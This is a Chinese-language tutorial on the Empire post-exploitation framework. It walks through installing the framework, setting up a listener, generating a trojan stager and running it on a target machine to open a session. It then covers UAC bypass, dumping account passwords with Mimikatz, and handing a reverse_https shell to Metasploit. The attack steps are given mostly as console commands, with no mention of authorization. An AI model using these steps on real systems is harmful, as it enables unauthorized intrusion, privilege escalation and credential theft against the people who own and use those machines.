后滲透工具Empire使用教程

一、前言

Empire是一個PowerShell后期漏洞利用代理工具同時也是一款很強大的后滲透測神器，它建立在密碼學、安全通信和靈活的架構之上。Empire實現了無需powershell.exe就可運行PowerShell代理的功能。快速部署后期漏洞利用模塊，從鍵盤記錄器到Mimikatz，並且能夠適應通信躲避網絡檢測，所有的這些功能都封裝在一個以實用性為重點的框架中

二、empire使用詳解

1.Empire 的安裝

git clone https://github.com/EmpireProject/Empire.git

unzip Empire-master.zip

cd  Empire-master

cd setup/

./install.sh

(最后輸入數據庫密碼)

2.設置監聽

cd  Empire-master

./empire

(Empire) > help #主菜單幫助命令

 

(Empire) > listeners #查看本地監聽代理地址，現在還沒有會話代理,所以為空

 

進入后需要使用監聽種類，輸入 uselistener 加空格然后兩下 tab 可列出所有的可使用監聽類，這里我們使用 http

 

(Empire: listeners) > info #列出詳細信息

 

(Empire: listeners) > set Name bk #設置Name為bk

(Empire: listeners) > execute #執行命令，這條命令將其name設置生效

 

至此，監聽工作完成。我們開始配置生成后門。

3、生成木馬

設置好監聽后通過 back 命令返回上一級，然后使用 usestager 命令來指定生成木馬的類型，通過空格加兩下 tab 可查看所有生成文件的類型，這里我們使用 windows/hta，即 windows 平台下的 hta文件，同樣，通過 info 查看此模塊的詳細信息。

(Empire: listeners/http) > back #返回上層模塊

 

(Empire: listeners/http) > usestager #空格加兩下tab

 

生成的文件類型大體有三類，multi 開頭的是通用類，osx 開頭即 mac 使用，windows 即 win 平台使用。

(Empire: listeners) > usestager windows/launcher_bat bk  # 選擇木馬種類

 

這里選擇的是hta類型的腳本，當然也可以選擇其他的。后面的bk就是剛剛設置的監聽，這個模塊就是依據監聽的配置信息，生成相應的木馬，讓反彈馬找到連接主機。

(Empire: stager/windows/launcher_bat) > info     #查看需要配置的參數信息

 

(Empire: stager/windows/hta > execute  #執行生成木馬

 

將代碼保存為hta文件，放到服務器上。

 

在目標機器上訪問

 

運行命令后，我們回到我們的機器可以看到已經獲取到了客戶端的一個會話

 

(Empire: stager/windows/launcher_bat) > agents   #查看獲取的代理會話

 

一個會話已經建立完成。

(Empire: agents) > rename DPFXWKY9 win10 #更改會話名字

 

(Empire: agents) > interact win10    #和該會話交互

 

我們通過 help 可查看一些命令和一些提供的內網滲透常用的工具

 

4、提權

如果想執行 windows 系統自帶的命令，可以通過 shell 加命令的格式，例如查看當前 shell 的權限，我們輸入 shell whoami /groups，返回了 medium 即非高權限，如下圖：

 

非高權限的話，很多命令使用會有限制，例如 mimikatz，所以下面需要提升權限，這里我們使用 bypassuac，首先 empire 提供了很多使用模塊，這里我們通過 usemodule 空格加兩下 tab 可查看全部模塊，有二百多個，如下圖：

 

bypassuac 提權我們使用 usemodule privesc/bypassuac 這個模塊，然后 info 查看其信息，如下圖：

 

這里我們需要設置的參數還是 Listener，即監聽的名稱，這里是 bk，如下圖：

 

設置后通過 execute 執行，成功后會返回一個新的 shell

 

隨后我們通過 agents 查看已有的 shell，username 前帶 * 號的就是高權限已經提權成功的 shell。

 

這時 mimikatz 已可以使用，輸入 mimikatz 來獲取目標賬號密碼，如下圖：

 

通過 mimikatz 獲取后，若在內網機器較多，為了查看方便，我們可以通過 creds 命令來直接列出其密碼，如下圖：

 

5、反彈shell給msf

empire 若需要結合 msf 使用，則可以將得到的 shell 反給 msf，使用模塊 code_execution/invoke_shellcode，info 信息如下：

 

這里需要設置下Lhost 和Lport，Lhost 即 msf 所在機器的 ip，Lport 即 msf 監聽反彈 shell 的端口，還有一個參數注意下，就是payload，默認值是 reverse_https，這個不用改，我們 msf 設置監聽時 payload 需要和其一致，也需要設置成 reverse_https，設置后我們先不執行 execute 命令，先把 msf 監聽設置好：

 

msf 的 payload 設置為 windows/meterpreter/reverse_https，Lhost 為本機所在的 ip，Lport 端口和剛才 empire 設置的一樣，這里是 4444，然后 exploit 執行監聽，這時返回 empire 執行 execute，停一會會看到 msf 已經收到了 shell，如下圖：

 

返回 shell 后，我們可以執行 whoami /groups 看下權限，可以看到返回的是高權限的 shell，如下圖：